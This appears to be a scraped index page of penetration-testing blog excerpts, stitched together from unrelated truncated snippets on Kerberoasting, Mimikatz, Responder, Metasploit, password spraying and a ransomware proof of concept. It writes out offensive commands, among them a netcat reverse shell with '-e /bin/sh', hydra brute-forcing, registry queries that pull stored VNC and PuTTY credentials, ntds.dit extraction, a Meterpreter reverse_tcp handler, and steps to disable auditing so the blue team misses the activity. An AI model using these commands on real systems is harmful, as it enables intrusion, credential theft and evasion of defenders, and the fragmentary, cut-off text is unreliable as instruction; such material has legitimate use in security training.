Internal Infrastructure Pentest - Kerberoasting
- Firstly purge all the tickets - klist purge - klist - SPN scan for service accounts - setspn -T domain_name -F -Q */* - Now request Service...
Impacket: Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to...
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV ftp
Setup a listener: nc -lvp 4444 Connect using netcat reverse shell: nc -e /bin/sh 4444
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Contro...
reg query "HKCU\Software\ORL\WinVNC3\Password" reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query "HKCU\Software\SimonTatham\...
Skeleton Key Attack: This attack is very tricky. It creates a secondary password for the same user. Many malware families take advantage of this attack to create ...
Mimikatz: mimikatz is a tool gentilkiwi made to learn C and make some experiments with Windows security. It's now well known to extract plaintext passwords...
Password Spraying: It is a technique of trying one password across all the domain users. - No tool needed. One can perform password spraying using cmd.ex...
Hashcat hashcat64.bin -a 0 -m 5600 hashes dict.txt -o output.pot
LLMNR (Link-Local Multicast Name Resolution): The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet f...
Dumpsec: DumpSec is a security auditing program for Microsoft Windows. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, re...
Clear text proxy credentials of PuTTY: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" This lists out all available sessions with pu...
Method 1: ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:...
- reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - PsExec64.exe \\172.20.10.8 -...
Active Reconnaissance Methods: Null Session: net use \\[DA IP Address]\ipc$ "" "/user:" here we're trying to connec...
Commands for Initial Investigation tasklist TASKLIST TASKLIST /M TASKLIST /V /FO CSV TASKLIST /SVC /FO LIST TASKLIST ...
Disable security policies and services to avoid detection by Blue team Auditpol /set /Category:System /failure:disable Services.msc: ...
ALT+F4: Quit program ALT+SPACE: System Menu ALT+TAB: Switch between open programs CTRL+ALT+DEL: Task Manager or Windows Security Screen CTRL+B: Op...
%USERPROFILE% %PROGRAMDATA% %PUBLIC% %TMP% %WINDIR% %SYSTEMDRIVE% %SYSTEMROOT%
Visit http://ikat.ha.cked.net/ from the Browser
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} Shell:Profile Shell:ProgramFiles Shell:System Shell:Control...
Brace Yourself: Cyber Attacks on Australian Businesses Set to Skyrocket
Over the last few days, I observed targeted campaigns against the Microsoft brand. Using multiple feed sources, I found 447 unique malicious domains.
Command & Control Server:
https://www.fcc.gov/oet/ea/fccid
Responder.py -i local-ip -I interface
sudo passwd kali sudo apt-get update sudo apt-get install xrdp lxde-core lxde tigervnc-standalone-server -y cd / sudo sed -i 's/allowed_users=.*/a...
adduser user1 passwd user1 type new password: xxxxxxxxxxxxxxx type confirm password: xxxxxxxxxxxx Adding user to the sudoers ...
HiveJack This tool can be used during internal penetration testing to dump Windows credentials from an already-compromised host. It allows one to dump SYSTEM...
Examples of at.exe being used maliciously in order to establish persistence in a manner almost identical to schtasks use as a lolbin (enter hashes into viru...
- sudo wget http://downloads.nessus.org/nessus3dl.php?file=Nessus-6.11.1-debian6_amd64.deb - sudo dpkg -i Nessus-6.11.1-debian6_amd64.deb - In case you hav...
Ping sweep is the process of pinging an entire range of network IP addresses to find out which ones are online or alive. Nmap is an excellent tool to do t...
Download Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
• Windows 7 UAC whitelist, http://www.pretentiousname.com/misc/win7_uac_whitelist2.html • Malicious Application Compatibility Shims, https://www.blackhat.co...
- Boot the machine with Kali - fdisk -l - look for (HPFS/NTFS/exFat) in the Type column of the above command - mkdir /mnt/nts - mount -t ntfs-3g /dev/sda1 ...
Handler on Msfconsole - use exploit/multi/handler - set PAYLOAD windows/meterpreter/reverse_tcp - set LHOST localhost - set LPORT 4444 - set Exi...
msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER test SMBUSER => test msf auxiliary(smb_enum_gpp) > set S...
SOCKS 5 proxy tunnel:
Below are some of the vulnerability reports in the HTML to PDF converters or PDF parsers.
Thanks to Keld Norman
I was playing with Pi-hole on one of my old Raspberry Pis and noticed that my 32 GB SanDisk Micro SD card was showing only 100 MB as space. I tried multip...
Phirautee A proof of concept crypto virus to spread user awareness about attacks and implications of ransomware. Phirautee is written purely using PowerShel...
Nette Framework: Nette Framework is an open-source framework for creating web applications in PHP 5 and 7. It supports AJAX, DRY, KISS, MVC and code reusabil...
BigBountyRecon BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial recon...
Happy New Year, readers!
In-memory execution is a technique used by malware developers to evade detection by traditional antivirus solutions. Instead of writing their malicious code ...